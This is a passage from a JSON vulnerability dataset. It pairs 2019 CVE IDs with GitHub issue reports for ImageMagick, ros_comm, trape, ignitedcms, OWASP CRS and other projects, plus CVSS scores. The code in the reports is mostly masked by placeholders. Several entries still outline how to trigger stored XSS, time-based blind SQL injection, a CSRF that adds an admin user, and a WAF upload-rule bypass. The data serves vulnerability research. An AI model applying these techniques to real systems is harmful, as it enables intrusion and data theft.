  36279. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36280. "severity": "HIGH",
  36281. "baseScore": 8.8,
  36282. "impactScore": 5.9,
  36283. "exploitabilityScore": 2.8
  36284. },
  36285. {
  36286. "CVE_ID": "CVE-2019-13300",
  36287. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1586",
  36288. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1586",
  36289. "Repo_new": "imagemagick/imagemagick",
  36290. "Issue_Created_At": "2019-06-10T15:57:48Z",
  36291. "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in APITAG in . APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
  36292. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36293. "severity": "HIGH",
  36294. "baseScore": 8.8,
  36295. "impactScore": 5.9,
  36296. "exploitabilityScore": 2.8
  36297. },
  36298. {
  36299. "CVE_ID": "CVE-2019-13301",
  36300. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1589",
  36301. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1589",
  36302. "Repo_new": "imagemagick/imagemagick",
  36303. "Issue_Created_At": "2019-06-11T05:31:32Z",
  36304. "description": "heap use-after-free in APITAG and double free in APITAG of APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap use-after-free (sometimes a heap buffer overflow) vulnerability in APITAG in . APITAG and a double-free bug in APITAG APITAG, both triggered by the same input. Different bugs are triggered on each run, so please run the command many times. related NUMBERTAG URLTAG Steps to Reproduce APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG version: Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
  36305. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36306. "severity": "MEDIUM",
  36307. "baseScore": 6.5,
  36308. "impactScore": 3.6,
  36309. "exploitabilityScore": 2.8
  36310. },
  36311. {
  36312. "CVE_ID": "CVE-2019-13301",
  36313. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1585",
  36314. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1585",
  36315. "Repo_new": "imagemagick/imagemagick",
  36316. "Issue_Created_At": "2019-06-10T14:34:22Z",
  36317. "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a heap buffer overflow vulnerability in APITAG in . APITAG It does not always occur, so the command needs to be executed several times. I found that this bug is not reliably reproduced, but it is reproduced with certain arguments. closed report URLTAG APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
  36318. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36319. "severity": "MEDIUM",
  36320. "baseScore": 6.5,
  36321. "impactScore": 3.6,
  36322. "exploitabilityScore": 2.8
  36323. },
  36324. {
  36325. "CVE_ID": "CVE-2019-13302",
  36326. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1597",
  36327. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1597",
  36328. "Repo_new": "imagemagick/imagemagick",
  36329. "Issue_Created_At": "2019-06-17T03:51:17Z",
  36330. "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36331. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36332. "severity": "HIGH",
  36333. "baseScore": 8.8,
  36334. "impactScore": 5.9,
  36335. "exploitabilityScore": 2.8
  36336. },
  36337. {
  36338. "CVE_ID": "CVE-2019-13303",
  36339. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1603",
  36340. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1603",
  36341. "Repo_new": "imagemagick/imagemagick",
  36342. "Issue_Created_At": "2019-06-18T17:08:25Z",
  36343. "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG I compiled APITAG with the disable openmp option. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36344. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36345. "severity": "HIGH",
  36346. "baseScore": 8.8,
  36347. "impactScore": 5.9,
  36348. "exploitabilityScore": 2.8
  36349. },
  36350. {
  36351. "CVE_ID": "CVE-2019-13304",
  36352. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1614",
  36353. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1614",
  36354. "Repo_new": "imagemagick/imagemagick",
  36355. "Issue_Created_At": "2019-06-21T06:36:50Z",
  36356. "description": "stack buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36357. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36358. "severity": "HIGH",
  36359. "baseScore": 7.8,
  36360. "impactScore": 5.9,
  36361. "exploitabilityScore": 1.8
  36362. },
  36363. {
  36364. "CVE_ID": "CVE-2019-13305",
  36365. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1613",
  36366. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1613",
  36367. "Repo_new": "imagemagick/imagemagick",
  36368. "Issue_Created_At": "2019-06-21T06:23:44Z",
  36369. "description": "stack buffer overflow at APITAG in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36370. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36371. "severity": "HIGH",
  36372. "baseScore": 7.8,
  36373. "impactScore": 5.9,
  36374. "exploitabilityScore": 1.8
  36375. },
  36376. {
  36377. "CVE_ID": "CVE-2019-13306",
  36378. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1612",
  36379. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1612",
  36380. "Repo_new": "imagemagick/imagemagick",
  36381. "Issue_Created_At": "2019-06-21T06:13:39Z",
  36382. "description": "stack buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG I think this is related to NUMBERTAG URLTAG, but that one was a heap buffer overflow and this issue is about a stack buffer overflow. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36383. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36384. "severity": "HIGH",
  36385. "baseScore": 7.8,
  36386. "impactScore": 5.9,
  36387. "exploitabilityScore": 1.8
  36388. },
  36389. {
  36390. "CVE_ID": "CVE-2019-13307",
  36391. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1615",
  36392. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1615",
  36393. "Repo_new": "imagemagick/imagemagick",
  36394. "Issue_Created_At": "2019-06-22T02:11:22Z",
  36395. "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36396. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36397. "severity": "HIGH",
  36398. "baseScore": 7.8,
  36399. "impactScore": 5.9,
  36400. "exploitabilityScore": 1.8
  36401. },
  36402. {
  36403. "CVE_ID": "CVE-2019-13308",
  36404. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1595",
  36405. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1595",
  36406. "Repo_new": "imagemagick/imagemagick",
  36407. "Issue_Created_At": "2019-06-17T02:21:01Z",
  36408. "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG, and I compiled the latest version with the disable openmp option. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36409. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36410. "severity": "HIGH",
  36411. "baseScore": 8.8,
  36412. "impactScore": 5.9,
  36413. "exploitabilityScore": 2.8
  36414. },
  36415. {
  36416. "CVE_ID": "CVE-2019-13309",
  36417. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1616",
  36418. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1616",
  36419. "Repo_new": "imagemagick/imagemagick",
  36420. "Issue_Created_At": "2019-06-23T08:45:54Z",
  36421. "description": "memory leaks are detected at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are memory leaks in APITAG This issue may be related to NUMBERTAG URLTAG. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36422. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36423. "severity": "MEDIUM",
  36424. "baseScore": 6.5,
  36425. "impactScore": 3.6,
  36426. "exploitabilityScore": 2.8
  36427. },
  36428. {
  36429. "CVE_ID": "CVE-2019-13311",
  36430. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1623",
  36431. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1623",
  36432. "Repo_new": "imagemagick/imagemagick",
  36433. "Issue_Created_At": "2019-07-01T18:19:43Z",
  36434. "description": "memory leaks are detected at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are memory leaks which are detected at APITAG This may be related to NUMBERTAG URLTAG. Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp without png, and I also tested on Ubuntu NUMBERTAG with clang NUMBERTAG and gcc NUMBERTAG APITAG",
  36435. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36436. "severity": "MEDIUM",
  36437. "baseScore": 6.5,
  36438. "impactScore": 3.6,
  36439. "exploitabilityScore": 2.8
  36440. },
  36441. {
  36442. "CVE_ID": "CVE-2019-13339",
  36443. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/32",
  36444. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/32",
  36445. "Repo_new": "bg5sbk/minicms",
  36446. "Issue_Created_At": "2019-07-04T10:12:43Z",
  36447. "description": "Another XSS found. POC NUMBERTAG Enter setting page FILETAG NUMBERTAG Upload the payload in comment FILETAG NUMBERTAG Then write an article and set the comment code into true and save FILETAG NUMBERTAG When someone is reading the article, there will be FILETAG",
  36448. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  36449. "severity": "MEDIUM",
  36450. "baseScore": 4.8,
  36451. "impactScore": 2.7,
  36452. "exploitabilityScore": 1.7
  36453. },
  36454. {
  36455. "CVE_ID": "CVE-2019-13351",
  36456. "Issue_Url_old": "https://github.com/xbmc/xbmc/issues/16258",
  36457. "Issue_Url_new": "https://github.com/xbmc/xbmc/issues/16258",
  36458. "Repo_new": "xbmc/xbmc",
  36459. "Issue_Created_At": "2019-06-10T23:45:04Z",
  36460. "description": "Sporadic crash when during on my APITAG due to double APITAG on the same fd in APITAG Bug report Describe the bug Here is a clear and concise description of what the problem is: Kodi crashes sporadically when I turn on my TV and receiver since I upgraded to Ubuntu NUMBERTAG There is a double close somewhere on the APITAG thread which is racing against the APITAG libudev has an assert when close returns EBADF. When I turn the TV on, it triggers udev_enumerate_scan_devices. This has been difficult to debug due to the sporadic nature of the race condition. I've straced kodi NUMBERTAG with APITAG calls, but if I add openat to the list, it disturbs the timing enough that I haven't been able to reproduce with that strace attached. It happens at least NUMBERTAG of the time turning my TV on with no strace attached. Expected Behavior Here is a clear and concise description of what was expected to happen: Kodi should not crash sporadically when turning on my TV. Actual Behavior Kodi crashes sporadically when turning on my TV. Possible Fix To Reproduce Steps to reproduce the behavior NUMBERTAG Boot machine with auto login to kodi. I'm using ALSA HDMI audio. The EDID is fixed NUMBERTAG Turn my TV on. This triggers the receiver on via CEC NUMBERTAG Kodi crashes. 
Debuglog The debuglog can be found here: APITAG is not on for this log because it disturbs the timing enough to mess with the race condition, and makes it hard to reproduce): FILETAG Stack strace from the core dump, it asserts inside libudev due to the double close on the other thread: FILETAG List of thread names for the tids: FILETAG Tail of the an strace showing the double close on the APITAG thread: FILETAG Screenshots Here are some links or screenshots to help explain the problem: Additional context or screenshots (if appropriate) Here is some additional context or explanation that might help: Your Environment Used Operating system: [ ] Android [ ] iOS [x] Linux [ ] OSX [ ] Raspberry Pi [ ] Windows [ ] Windows UWP Operating system version/name: Ubuntu NUMBERTAG Kodi version NUMBERTAG note: Once the issue is made we require you to update it with new information or Kodi versions should that be required. Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.",
  36461. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36462. "severity": "HIGH",
  36463. "baseScore": 8.1,
  36464. "impactScore": 5.9,
  36465. "exploitabilityScore": 2.2
  36466. },
  36467. {
  36468. "CVE_ID": "CVE-2019-13362",
  36469. "Issue_Url_old": "https://github.com/michaelrsweet/codedoc/issues/5",
  36470. "Issue_Url_new": "https://github.com/michaelrsweet/codedoc/issues/5",
  36471. "Repo_new": "michaelrsweet/codedoc",
  36472. "Issue_Created_At": "2019-07-03T08:29:50Z",
  36473. "description": "stack buffer overflow in codedoc_strlcpy APITAG PATHTAG ./codedoc poc2 FILETAG asan output ERRORTAG gcc output ERRORTAG",
  36474. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36475. "severity": "HIGH",
  36476. "baseScore": 7.8,
  36477. "impactScore": 5.9,
  36478. "exploitabilityScore": 1.8
  36479. },
  36480. {
  36481. "CVE_ID": "CVE-2019-13370",
  36482. "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/7",
  36483. "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/7",
  36484. "Repo_new": "ignitedcms/ignitedcms",
  36485. "Issue_Created_At": "2019-07-02T02:36:52Z",
  36486. "description": "A CSRF vulnerability exists. When the administrator logs in, open the POC page constructed by the attacker and a new user will be automatically added. POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  36487. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36488. "severity": "HIGH",
  36489. "baseScore": 8.8,
  36490. "impactScore": 5.9,
  36491. "exploitabilityScore": 2.8
  36492. },
  36493. {
  36494. "CVE_ID": "CVE-2019-13391",
  36495. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1588",
  36496. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1588",
  36497. "Repo_new": "imagemagick/imagemagick",
  36498. "Issue_Created_At": "2019-06-11T03:25:05Z",
  36499. "description": "heap buffer overflow in APITAG or heap use after free in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow in APITAG in . APITAG or a heap use after free in APITAG in APITAG with the same input. Heap buffer overflow sometimes occur and heap use after free is rarely found with the same command. To trigger these bugs, please run the command for many times. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
  36500. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36501. "severity": "HIGH",
  36502. "baseScore": 8.8,
  36503. "impactScore": 5.9,
  36504. "exploitabilityScore": 2.8
  36505. },
  36506. {
  36507. "CVE_ID": "CVE-2019-13445",
  36508. "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1738",
  36509. "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1738",
  36510. "Repo_new": "ros/ros_comm",
  36511. "Issue_Created_At": "2019-07-02T21:42:17Z",
  36512. "description": "potential integer overflow. Potentially overflowing expression NUMBERTAG S\" with type \"int NUMBERTAG bits, signed) is evaluated using NUMBERTAG bit arithmetic, and then used in a context that expects an expression of type \"uint NUMBERTAG t NUMBERTAG bits, unsigned). URLTAG To avoid overflow, cast either NUMBERTAG or \"S\" to type \"uint NUMBERTAG t\".",
  36513. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36514. "severity": "CRITICAL",
  36515. "baseScore": 9.8,
  36516. "impactScore": 5.9,
  36517. "exploitabilityScore": 3.9
  36518. },
  36519. {
  36520. "CVE_ID": "CVE-2019-13454",
  36521. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1629",
  36522. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1629",
  36523. "Repo_new": "imagemagick/imagemagick",
  36524. "Issue_Created_At": "2019-07-07T02:34:55Z",
  36525. "description": "Division by Zero at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a division by zero at APITAG Steps to Reproduce APITAG columns != next >columns || curr >rows != next >rows NUMBERTAG curr >page.x != next >page.x || curr >page.y != next >page.y NUMBERTAG continue NUMBERTAG APITAG NUMBERTAG if ( bounds.x APITAG delay NUMBERTAG curr >ticks_per_second NUMBERTAG time += next >delay NUMBERTAG next >ticks_per_second NUMBERTAG next >ticks_per_second NUMBERTAG L NUMBERTAG next >delay = time curr >ticks_per_second NUMBERTAG next >iterations = curr >iterations NUMBERTAG images = curr NUMBERTAG oid) APITAG NUMBERTAG APITAG APITAG runtime error: division by zero SUMMARY: APITAG undefined behavior APITAG in APITAG APITAG NUMBERTAG ERROR: APITAG UNKNOWN SIGNAL on unknown address NUMBERTAG pc NUMBERTAG fe NUMBERTAG baee9e7 bp NUMBERTAG ffc NUMBERTAG e NUMBERTAG sp NUMBERTAG ffc NUMBERTAG e NUMBERTAG ec0 T NUMBERTAG fe NUMBERTAG baee9e6 in APITAG APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG a8 in APITAG APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG fe NUMBERTAG c6aef4 in APITAG APITAG APITAG NUMBERTAG fe NUMBERTAG c6dc NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fe NUMBERTAG d NUMBERTAG e in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG e1 in main APITAG NUMBERTAG fe NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. 
SUMMARY: APITAG UNKNOWN SIGNAL APITAG in APITAG NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG CFLAGS=\" fsanitize=address,undefined g\" CXXFLAGS=\" fsanitize=address,undefined g\" ./configure disable openmp without png APITAG",
  36526. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36527. "severity": "MEDIUM",
  36528. "baseScore": 6.5,
  36529. "impactScore": 3.6,
  36530. "exploitabilityScore": 2.8
  36531. },
  36532. {
  36533. "CVE_ID": "CVE-2019-13464",
  36534. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386",
  36535. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1386",
  36536. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  36537. "Issue_Created_At": "2019-05-04T03:56:08Z",
  36538. "description": "Bypass rule PHP Script Uploads with id NUMBERTAG and id NUMBERTAG Type of Issue Incorrect blocking (filed under the 'false positive' template item, but the behavior described is a rule bypass, i.e. a false negative: a PHP upload that the rule should block is not detected) Description I bypassed this pull issue NUMBERTAG URLTAG In rule id NUMBERTAG This behavior returns true (the rule matches) ERRORTAG But, by replacing APITAG to APITAG CODETAG in my php application, that understanding APITAG is APITAG request: APITAG response: FILETAG And rule id NUMBERTAG behaves the same Your Environment I tested my ubuntu NUMBERTAG PHP version NUMBERTAG and the latest version crs APITAG Confirmation [X] I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted.",
  36539. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  36540. "severity": "HIGH",
  36541. "baseScore": 7.5,
  36542. "impactScore": 3.6,
  36543. "exploitabilityScore": 3.9
  36544. },
  36545. {
  36546. "CVE_ID": "CVE-2019-13465",
  36547. "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1748",
  36548. "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1748",
  36549. "Repo_new": "ros/ros_comm",
  36550. "Issue_Created_At": "2019-07-09T17:55:55Z",
  36551. "description": "Coverity: invalidated iterator causes overflow. When ROS_ASSERT_ENABLED is not defined (so the assertion that would otherwise catch this is compiled out), the following iterator will overflow, i.e. run past the end of its container: URLTAG",
  36552. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
  36553. "severity": "HIGH",
  36554. "baseScore": 8.6,
  36555. "impactScore": 4.0,
  36556. "exploitabilityScore": 3.9
  36557. },
  36558. {
  36559. "CVE_ID": "CVE-2019-13488",
  36560. "Issue_Url_old": "https://github.com/jofpin/trape/issues/169",
  36561. "Issue_Url_new": "https://github.com/jofpin/trape/issues/169",
  36562. "Repo_new": "jofpin/trape",
  36563. "Issue_Created_At": "2019-06-15T05:39:49Z",
  36564. "description": "Stored XSS in PATHTAG Overview User input is embedded in admin interface through APITAG unsafe APITAG method. This leads to Cross site Scripting attack. The vulnerability is in URLTAG The vulnerable parameters are ERRORTAG sent in APITAG request. Proof of concept NUMBERTAG APITAG NUMBERTAG Send the following HTTP request ERRORTAG NUMBERTAG Open the Control Panel link , we see APITAG box.",
  36565. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36566. "severity": "MEDIUM",
  36567. "baseScore": 6.1,
  36568. "impactScore": 2.7,
  36569. "exploitabilityScore": 2.8
  36570. },
  36571. {
  36572. "CVE_ID": "CVE-2019-13489",
  36573. "Issue_Url_old": "https://github.com/jofpin/trape/issues/168",
  36574. "Issue_Url_new": "https://github.com/jofpin/trape/issues/168",
  36575. "Repo_new": "jofpin/trape",
  36576. "Issue_Created_At": "2019-06-14T09:39:23Z",
  36577. "description": "Blind SQL injection in core/db.py. Description User input is not escaped when building the SQL command. As a result, the application is vulnerable to SQL injection attack. Proof of concept NUMBERTAG APITAG NUMBERTAG Send the following HTTP request CODETAG NUMBERTAG The final SQL query is: CODETAG NUMBERTAG If the condition inside APITAG is true, APITAG is executed, which leads to a large delay and/or a returned status code of NUMBERTAG This enables an attacker to run a blind (time-based / boolean-based) SQL injection attack. Impact Dump the whole database of trape. How to fix The vulnerability is in URLTAG The APITAG variable is manually concatenated into the SQL command. To fix this, the developer should stop concatenating the APITAG variable into the query and pass it as a bound parameter of a parameterized query; if it can only legitimately take a fixed set of values, additionally validate it against a whitelist before constructing the query.",
  36578. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36579. "severity": "CRITICAL",
  36580. "baseScore": 9.8,
  36581. "impactScore": 5.9,
  36582. "exploitabilityScore": 3.9
  36583. },
  36584. {
  36585. "CVE_ID": "CVE-2019-13506",
  36586. "Issue_Url_old": "https://github.com/Rich-Harris/devalue/issues/19",
  36587. "Issue_Url_new": "https://github.com/rich-harris/devalue/issues/19",
  36588. "Repo_new": "rich-harris/devalue",
  36589. "Issue_Created_At": "2019-04-12T21:54:12Z",
  36590. "description": "Security: APITAG XSS. As shown in URLTAG and URLTAG devalue exposes a XSS vulnerability, when an object key contains unsafe characters. From the issue: > I think it should be safe to use the same approach as in serialize javascript to replace unsafe characters: URLTAG",
  36591. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36592. "severity": "MEDIUM",
  36593. "baseScore": 6.1,
  36594. "impactScore": 2.7,
  36595. "exploitabilityScore": 2.8
  36596. },
  36597. {
  36598. "CVE_ID": "CVE-2019-13566",
  36599. "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1735",
  36600. "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1735",
  36601. "Repo_new": "ros/ros_comm",
  36602. "Issue_Created_At": "2019-07-02T19:28:39Z",
  36603. "description": "Coverity reports a potential string overflow in APITAG NUMBERTAG Event fixed_size_dest: You might overrun the NUMBERTAG character fixed size string \"namebuf\" by copying the return value of \"inet_ntoa\" without checking the length. (Note: for an IPv4 dotted quad, inet_ntoa yields at most 15 characters plus the terminator, so whether this overruns depends on the declared size of namebuf and on what else is copied into it; the related ros_comm issue 1752 under the same CVE covers the case where a long reverse-DNS hostname is copied instead.) URLTAG",
